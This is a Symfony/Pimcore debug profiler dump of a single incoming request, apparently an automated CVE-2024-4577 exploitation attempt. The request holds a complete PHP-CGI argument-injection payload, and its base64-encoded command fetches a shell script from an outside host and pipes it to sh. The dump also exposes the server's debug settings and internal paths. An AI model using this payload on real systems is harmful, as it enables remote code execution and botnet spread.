https://206.189.104.255/hello.world?%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput=

n/a

Request

GET Parameters

Key Value
�d_allow_url_include=1_�d_auto_prepend_file=php://input
""

POST Parameters

Key Value
<?php_shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMTc4LjE2LjU1LjIyNC9zaCB8fCBjdXJsIC1zayBodHRwczovLzE3OC4xNi41NS4yMjQvc2gpIHwgc2ggLXMgY3ZlXzIwMjRfNDU3Ny5zZWxmcmVw"));_echo(md5("Hello_CVE-2024-4577"));_?>
""

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_editmode
false
_pimcore_context
"default"
_pimcore_frontend_request
true
_remove_csp_headers
true
_stopwatch_token
"59e01e"

Request Headers

Header Value
accept
"*/*"
connection
"keep-alive"
content-length
"241"
content-type
"application/x-www-form-urlencoded"
host
"206.189.104.255:443"
upgrade-insecure-requests
"1"
user-agent
"libredtail-http"
x-php-ob-level
"1"

Request Content

Raw

<?php shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMTc4LjE2LjU1LjIyNC9zaCB8fCBjdXJsIC1zayBodHRwczovLzE3OC4xNi41NS4yMjQvc2gpIHwgc2ggLXMgY3ZlXzIwMjRfNDU3Ny5zZWxmcmVw")); echo(md5("Hello CVE-2024-4577")); ?>

Response

Response Headers

Header Value
cache-control
"private, must-revalidate"
content-language
"en"
content-type
"text/html; charset=UTF-8"
date
"Mon, 09 Feb 2026 07:03:02 GMT"
expires
"Tue, 01 Jan 1980 00:00:00 GMT"
pragma
"no-cache"
vary
"Accept"
x-debug-exception
"No%20route%20found%20for%20%22POST%20https%3A%2F%2F206.189.104.255%2Fhello.world%22"
x-debug-exception-file
"%2Fvar%2Fwww%2Fhtml%2Fpimcore%2Freleases%2F33%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135"
x-debug-token
"f7775f"
x-debug-token-link
"https://206.189.104.255/_profiler/f389ba"
x-powered-by
"pimcore"
x-previous-debug-token
"f389ba"
x-robots-tag
"noindex"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_DEBUG
"1"
APP_ENV
"dev"
ASSET_CSV_EXPORT_PATH
"../../../../../../../hfarm/shared/webdav/onSales/csvExport/aton-assets/"
DOCUMENTS_INPUT_PATH
"/shared/input/assets/technicalSheets/"
IMAGES_INPUT_PATH
"/shared/input/assets/images/"
IMAGES_INSERTION_PATH
"/Data/Products/"
PDF_IMAGES_EXPORT_PATH
"../../../hfarm/shared/webdav/onSales/items/"
PIMCORE_DEV_MODE
"false"
PRODUCT_CSV_EXPORT_PATH
"../../../../../../../hfarm/shared/webdav/onSales/csvExport/aton-products/"
SHOPIFY_AUTOMATIC_EXPORT_PATH
"/shared/csvExport/"
SHOPIFY_CSV_EXPORT_PATH
"../../../../../../../hfarm/shared/webdav/onSales/csvExport/shopify/"
SHOPIFY_EXCEL_EXPORT_PATH
"../../../../../../../hfarm/shared/webdav/onSales/csvExport/shopify/"

Defined as regular env variables

Key Value
CONTENT_LENGTH
"241"
CONTENT_TYPE
"application/x-www-form-urlencoded"
DOCUMENT_ROOT
"/var/www/html/pimcore/current/public"
DOCUMENT_URI
"/index.php"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HOME
"/var/www"
HTTPS
"on"
HTTP_ACCEPT
"*/*"
HTTP_CONNECTION
"keep-alive"
HTTP_CONTENT_LENGTH
"241"
HTTP_CONTENT_TYPE
"application/x-www-form-urlencoded"
HTTP_HOST
"206.189.104.255:443"
HTTP_UPGRADE_INSECURE_REQUESTS
"1"
HTTP_USER_AGENT
"libredtail-http"
PATH_INFO
""
PHP_SELF
"/index.php"
QUERY_STRING
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_STATUS
"200"
REMOTE_ADDR
"210.211.122.97"
REMOTE_PORT
"32856"
REMOTE_USER
""
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"https"
REQUEST_TIME
1770620582
REQUEST_TIME_FLOAT
1770620582.3542
REQUEST_URI
"/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
SCRIPT_FILENAME
"/var/www/html/pimcore/current/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"206.189.104.255"
SERVER_NAME
""
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SOFTWARE
"nginx/1.18.0"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_DEBUG,PIMCORE_DEV_MODE,ASSET_CSV_EXPORT_PATH,PRODUCT_CSV_EXPORT_PATH,SHOPIFY_CSV_EXPORT_PATH,SHOPIFY_EXCEL_EXPORT_PATH,PDF_IMAGES_EXPORT_PATH,SHOPIFY_AUTOMATIC_EXPORT_PATH,IMAGES_INPUT_PATH,DOCUMENTS_INPUT_PATH,IMAGES_INSERTION_PATH"
USER
"www-data"

Sub Requests 1

ErrorController (token = f389ba)

Key Value
_controller
"error_controller"
_editmode
false
_pimcore_context
"default"
_stopwatch_token
"07d792"
exception
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#1783
  #message: "No route found for "POST https://206.189.104.255/hello.world""
  #code: 0
  #file: "/var/www/html/pimcore/releases/33/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 135
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#1776 …}
  -statusCode: 404
  -headers: []
  trace: {
    /var/www/html/pimcore/releases/33/vendor/symfony/http-kernel/EventListener/RouterListener.php:135 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /var/www/html/pimcore/releases/33/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:118 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
    }
    /var/www/html/pimcore/releases/33/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
    }
    /var/www/html/pimcore/releases/33/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /var/www/html/pimcore/releases/33/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:154 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /var/www/html/pimcore/releases/33/vendor/symfony/http-kernel/HttpKernel.php:139 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /var/www/html/pimcore/releases/33/vendor/symfony/http-kernel/HttpKernel.php:75 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
    }
    /var/www/html/pimcore/releases/33/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /var/www/html/pimcore/releases/33/public/index.php:36 {
      › 
      › $response = $kernel->handle($request);$response->send();
    }
  }
}
logger
Symfony\Bridge\Monolog\Logger {#292 …9}